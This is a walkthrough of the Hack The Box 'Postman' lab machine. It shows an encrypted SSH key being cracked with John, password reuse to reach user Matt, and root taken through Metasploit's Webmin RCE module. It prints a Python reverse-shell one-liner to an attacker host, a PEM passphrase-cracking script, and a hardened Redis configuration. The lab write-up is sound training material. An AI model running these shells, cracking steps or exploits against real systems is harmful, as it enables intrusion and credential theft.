root@kali:~/Desktop/HackTheBox-Machines/Postman echo -n "LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBERVMtRURFMy1DQkMsNzNFOUNFRkJDQ0Y1Mjg3QwoKSmVoQTUxSTE3cnNDT09WcXlXeCtDODM2M0lPQllYUTExRGR3L3ByM0wyQTJORHRCN3R2c1hOeXFLRGdoZlFuWApjd0dKSlVEOWtLSm5pSmtKenJ2RjFXZXB2TU5rajlaSXRYUXpZTjh3Ympscmt1MWJKcTV4bkpYOUVVYjVJN2syCjdHc1R3c012S3pYa2tmRVpRYVhLL1Q1MHMzSTRDZGNmYnIxZFhJeWFiWExMcFpPaVpFS3ZyNCtLeVNqcDRvdTYKY2RuQ1doemtBL1R3SnBYRzFXZU9tTXZ0Q1pXMUhDQnV0WXNOUDZCRGY3OGJRR21tbGlycVJtWGZMQjkySmhUOQoxdThKekhDSjF6Wk1HNXZhVXR2b24wcWdQeDd4ZUlVTzZMQUZUb3pyTjlNR1dFcUJFSjV6TVZycnQzVEdWa2N2CkV5dmxXd2tzN1IvZ2p4SHlVd1QrYTVMQ0dHU2pWRDg1THhZdXRnV3hPVUtidFdHQmJVOHlpN1lzWGxLQ3d3SFAKVUg3T2ZRejAzVld5K0swYWE4UXMrRXl3Nlgzd2JXbnVlMDNuZy9zTEpuSjcyOXpiM2t1eW04citoVSs5djZWWQpTaitRbmpWVFlqRGZuVDIyakpCVUhUVjJ5cktlQXo2Q1hkRlQreEloeEVBaXYwbTFaa2t5UWtXcFVpQ3p5dVlLCnQrTVN0d1d0U3QwVko0VTFOYTJHM3hHUGptcmttandYdnVkS0MwWU4vT0JvUFBPVGFCVkQ5aTZmc29aNnB3blMKNU1pOEJ6ckJoZE8wd0hhRGNUWVBjM0IwMEN3cUFWNU1YbWtBazJ6S0wwVzJ0ZFZZa3NLd3hLQ3dHbVdscGRrZQpQMkpHbHA5TFdFZXJNZm9sYmpUU09VNW1EZVBmTVEzZndDTzZNUEJpcXpyckZjUE5KcjcvTWNRRUNiNXNmK082CmpLRTNKZm4wVVZFMlFWZFZLM29FTDZEeWFCZi9XMmQvM1Q3cTEwVWQ3Sys0S2QzNmd4TUJmMzNFYTYrcXgzR2UKU2JKSWhrc3c1VEtoZDUwNUFpVUgyVG44OXFOR2VjVkpFYmpLZUovdkZaQzVZSXNRKzlzbDg5VG1KSEw3NFkzaQpsM1lYREVzUWpoWkh4WDVYL1JVMDJEK0FGMDdwM0JTUmpoRDMwY2pqMHV1V2tLb3dwb28wWTBlYmxnbWQ3bzJYCjBWSVdyc2tQSzRJN0lINWdia3J4VkdiLzlnL1cydWExQzNObmN2M01OY2YwbmxJMTE3QlMvUXdOdHVUb3pHOHAKUzlrM2xpK3JZcjZmM21hL1VMc1VuS2labHM4U3BVK1JzYW9zTEdLWjZwMm9JZThvUlNtbE9Dc1kwSUNxN2VSUgpoa3V6VXVIOXovbUJvMnRRV2g4cXZUb0NTRWpnOHlOTzl6OCtMZG9OMXdRV01QYVZ3UkJqSXl4Q1BIRlRKM3UrClp4eTB0SVB3akNadnhVZlluL0s0RlZIYXZ2QStiOWxvcG5VQ0VBRVJwd0l2OCt0WW9md0dWcExWQzBEck41OFYKWFRmQjJYOXNMMW9CM2hPNG1KRjBaM3lKMktaRWRZd0hHdXFOVEZhZ04wZ0JjeU5JMndzeFpOeklLMjZ2UHJPRApiNkJjOVVkaVdDWnFNS1V4NGFNVExoRzVST2pnUUd5dFdmL3E3TUdyTzNjRjI1azFQRVdOeVpNcVk0V1lzWlhpCldoUUZIa0ZPSU53VkVPdEhha1ovVG9ZYVVRTnRSVDZwWnlIZ3ZqVDBtVG8wdDNqVUVSc3BwajFwd2JnZ0NHbWgKS1RrbWhLK01UYW95ODlDZzBYdzJKMThEbTBvNzhwNlVOcmtTdWUxQ3NXakVmRUlGM05BTUVVMm8rTmdxOTJIbQpucEFGUmV0dndRN3h1a2swcmJiNm12RjhnU3FMUWc3V3BiWkZ5dGdTMDVUcFBaUE0waDh0UkU4WVJkSmhlV3JRClZjTnlaSDhPSFlxRVM0ZzJVRjYyS3B0dHFTd0xpaUY0dXRIcSsvaDVDUXdzRitKUmc4OGJueGgyejJCRDZpNVcKWCtoSzVIUHBwNlFualo4QTVFUnVVRUdhWkJFVXZHSnRQR0hqWnlMcGt5dE1oVGphT3JSTll3PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K" | base64 -d > Matts.KEy 

I cracked the SSH key by using ssh2john to turn the encrypted private key into a hash and brute-forcing its passphrase with John.

root@kali:~/Desktop/HackTheBox-Machines/Postman# /opt/JohnTheRipper/run/ssh2john.py Matts.KEy
Matts.KEy:$sshng$0$8$73E9CEFBCCF5287C$1192$...

root@kali:~/Desktop/HackTheBox-Machines/Postman# /opt/JohnTheRipper/run/ssh2john.py Matts.KEy > mattsHash

Now I have the hash in a file called mattsHash, as the last command shows. Next we use John to brute-force it.

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt mattsHash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (Matts.KEy)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2022-06-03 09:25) 0.1883g/s 2700Kp/s 2700Kc/s 2700KC/sa6_123..*7¡Vamos!
Session completed
┌─[puck@parrot-lt]─[~/htb/postman]

I got the passphrase: computer2008. So I tried to get in with it, but it did not work: we cannot SSH in as Matt, it is denied. So I figured it might be a password-reuse scenario. I logged in as redis with exploit.sh, used su Matt with computer2008, and we got the user Matt.
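What ssh2john and john are doing under the hood, as an added example for this writeup (it is not ssh2john or John the Ripper code): the DEK-Info header gives the cipher and IV, OpenSSL's legacy key derivation is two MD5 calls over the passphrase plus the first eight bytes of the IV, and a candidate is accepted on a cheap plaintext check. SAMPLE_KEY is constructed for this example: its header mirrors /opt/id_rsa.bak (same cipher and IV), its body is arbitrary bytes, so no passphrase opens it. The 3DES decryption assumes the pyca/cryptography package, which is not in the standard library; the function names are this example's own.

```python
#!/usr/bin/env python3
"""Why the passphrase on a legacy PEM key cracks at millions of guesses/s.

Added example for this writeup; not ssh2john or John the Ripper code.
Parses the DEK-Info header of a traditional (PKCS#1) OpenSSL-encrypted RSA
key, derives the 3DES key the way OpenSSL's EVP_BytesToKey does (MD5, one
round, salt = first 8 bytes of the IV) and tests candidate passphrases.
SAMPLE_KEY is a constructed stand-in: same header shape, cipher and IV as
/opt/id_rsa.bak above, arbitrary body bytes, so no passphrase opens it.
"""
import base64
import hashlib
import re

SAMPLE_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

AAECAwQFBgcICQoLDA0ODw==
-----END RSA PRIVATE KEY-----
"""


def parse_pem(text: str):
    """Return (cipher, iv, ciphertext) from a traditional OpenSSL-encrypted PEM."""
    hdr = re.search(r"DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", text)
    body = re.search(r"\r?\n\r?\n(.*?)-----END", text, re.S)
    if not hdr or not body:
        raise ValueError("no DEK-Info header: not a legacy encrypted PEM key")
    cipher, iv = hdr.group(1), bytes.fromhex(hdr.group(2))
    return cipher, iv, base64.b64decode("".join(body.group(1).split()))


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int = 24) -> bytes:
    """OpenSSL EVP_BytesToKey, MD5, count=1: D_i = MD5(D_{i-1} || pass || salt).

    Two MD5 calls give the 24-byte 3DES key and there is no stretching,
    which is why john reports millions of candidates per second and why
    its cost lines read "MD5/3DES" with an iteration count of 2.
    """
    d, key = b"", b""
    while len(key) < key_len:
        d = hashlib.md5(d + passphrase + salt).digest()
        key += d
    return key[:key_len]


def plausible_plaintext(pt: bytes) -> bool:
    """Cheap check before any real ASN.1 parsing.

    A decrypted PKCS#1 key starts with a DER SEQUENCE (0x30) and ends in
    valid PKCS#7 padding. A wrong passphrase occasionally passes this, which
    is the kind of false positive john warns about; confirm a hit with
    `ssh-keygen -y -f key` before trusting it.
    """
    if len(pt) < 16 or pt[0] != 0x30:
        return False
    pad = pt[-1]
    return 1 <= pad <= 8 and pt.endswith(bytes([pad]) * pad)


def check_passphrase(pem_text: str, passphrase: bytes) -> bool:
    """Decrypt with the derived key and apply the plausibility check.

    3DES is not in the standard library; this uses pyca/cryptography
    (pip install cryptography), an assumption of this example.
    """
    try:
        from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
    except ImportError:  # cryptography < 43
        from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
    from cryptography.hazmat.primitives.ciphers import Cipher, modes

    cipher, iv, ct = parse_pem(pem_text)
    if cipher != "DES-EDE3-CBC":
        raise NotImplementedError(f"{cipher}: add its key length and IV handling")
    key = evp_bytes_to_key(passphrase, iv[:8])
    dec = Cipher(TripleDES(key), modes.CBC(iv)).decryptor()
    return plausible_plaintext(dec.update(ct) + dec.finalize())


def crack(pem_text: str, wordlist):
    """Return the first candidate (bytes) that passes, or None."""
    for word in wordlist:
        word = word.rstrip(b"\r\n")
        if check_passphrase(pem_text, word):
            return word
    return None


if __name__ == "__main__":
    import sys
    key_file, words = sys.argv[1], sys.argv[2]   # e.g. Matts.KEy rockyou.txt
    with open(key_file) as fh, open(words, "rb") as wl:
        print(crack(fh.read(), wl))
```

Run it as python3 pem_crack.py Matts.KEy /usr/share/wordlists/rockyou.txt. It is far slower than john, but it makes the point: the only cost per guess is two MD5 calls and one 3DES block chain, so a dictionary of fourteen million entries is a matter of seconds for a real cracker.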

root@kali:~/Desktop/HackTheBox-Machines/Postman# ./exploit.sh 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:XTO4XdFGWOrxgauNIXyIDNUYptM90shUZ2j+ok1C90M root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       ==..o  .=o|
|      B.++o.  ooo|
|     + =o+. +.+o |
|      +.++oE =.o.|
|      .oS+*o... .|
|       . oo+=    |
|        = .o..   |
|       . .       |
|                 |
+----[SHA256]-----+
OK
OK
OK
OK
OK
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1

redis@Postman:~$ 
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ whoami
Matt

Rooting Postman.

I tried LinEnum.sh again as Matt and my shell broke. So I used the same credentials on the website's portal. When we try to log in, it says the server runs in SSL mode and that we have to connect over https, with a Postman entry in our hosts file. Let's do that quickly.

Postman Webmin

┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $echo "10.10.10.160 Postman" | sudo tee -a /etc/hosts; cat /etc/hosts
[sudo] password for puck: 
10.10.10.160 Postman
127.0.0.1 localhost

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.178.209 unika.htb
10.10.10.160 Postman
┌─[puck@parrot-lt]─[~/htb/postman]


Now we can reach the web portal over HTTPS on port 10000.

Postman Webmin hackthebox

Here we saw a version number in the Webmin panel. I googled for an exploit for it and found a Metasploit module for that exact version number; it was an authenticated remote code execution, so I used Metasploit. This was the exploit.
msf5 > use linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.165     yes       The listen address (an interface may be specified)
   LPORT  9004             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

These are the options I used in Metasploit. Don't forget to set SSL to true, because Webmin runs over SSL.

msf6 exploit(linux/http/webmin_packageup_rce) > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.2       yes       The listen address (an interface may be specified)
   LPORT  9002             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.2:9002 
[+] Session cookie: 9fc4d08d07df5caf01f4fa90cc769085
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:9002 -> 10.10.10.160:59780 ) at 2022-06-03 09:54:36 +0200

whoami

root

The Metasploit session is a bare command shell, so I spawned a second, PTY-backed reverse shell with Python to a netcat listener on port 9004:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",9004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'


┌─[puck@parrot-lt]─[~/htb/postman]
└──╼ $nc -nlvp 9004
listening on [any] 9004 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.160] 47606
# id
id
uid=0(root) gid=0(root) groups=0(root)
#
root@Postman:~# hostnamectl
hostnamectl
Static hostname: Postman
Icon name: computer-vm
Chassis: vm
Machine ID: 2cb57e052840450f9a54b149b131d24d
Boot ID: b59c72de907647508f55aa1f2bbba91d
Virtualization: vmware
Operating System: Ubuntu 18.04.3 LTS
Kernel: Linux 4.15.0-58-generic
Architecture: x86-64
root@Postman:~# 


root@Postman:~# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
..snip...
# m h dom mon dow command
@reboot ifconfig 192.168.0.80 netmask 255.255.255.0 up
@reboot iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6379
root@Postman:~#
root@Postman:~# systemctl status redis
systemctl status redis
* redis-server.service - Advanced key-value store
Loaded: loaded (/lib/systemd/system/redis-server.service; enabled; vendor preset: enabled)
Active: active (running) since Thu 2022-06-02 11:26:48 BST; 22h ago
Docs: http://redis.io/documentation,
man:redis-server(1)
Process: 603 ExecStart=/usr/bin/redis-server /etc/redis/redis.conf (code=exited, status=0/SUCCESS)
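Note that the root crontab above adds an iptables rule with no -j target and a source filter of a single address (-s 0.0.0.0), so it counts packets and blocks nothing; port 6379 stays reachable, which is how the foothold worked. The fix belongs in Redis itself. As an added example (not the configuration found on the box), a redis.conf fragment with the exposed settings beside their hardened replacements; the password is a placeholder:

```conf
# redis.conf: the exposure exploited above, and the hardened equivalent.
# Added example for this writeup, not the configuration from the box.

# --- what made the foothold possible: reachable from the network, no
#     password, and CONFIG/SAVE available to every client ---
# bind 0.0.0.0
# protected-mode no
# requirepass ""

# --- hardened ---
# Listen on loopback only; remote clients go through an SSH tunnel or VPN.
bind 127.0.0.1
# Refuse clients from non-loopback addresses when no password is configured.
protected-mode yes
# Long random password (placeholder here); clients must AUTH first.
requirepass ChangeMe-to-a-long-random-secret
# Remove the commands the writeup chained: without CONFIG there is no
# dir/dbfilename pivot, without SAVE no on-demand dump to an arbitrary path.
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command SAVE ""
rename-command DEBUG ""
# Keep the dump where only the redis user can read it, never a home or .ssh dir.
dir /var/lib/redis
# Redis 6+: ACLs replace rename-command; -@dangerous drops CONFIG, SAVE,
# FLUSHALL and friends for the default user.
# user default on >ChangeMe-to-a-long-random-secret ~* &* +@all -@dangerous
```

Comments must sit on their own lines: the Redis config parser does not accept trailing comments after a value. After restarting, redis-cli -h <host> config get dir from another machine should fail to connect or answer with an error, never with a directory.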


That's it.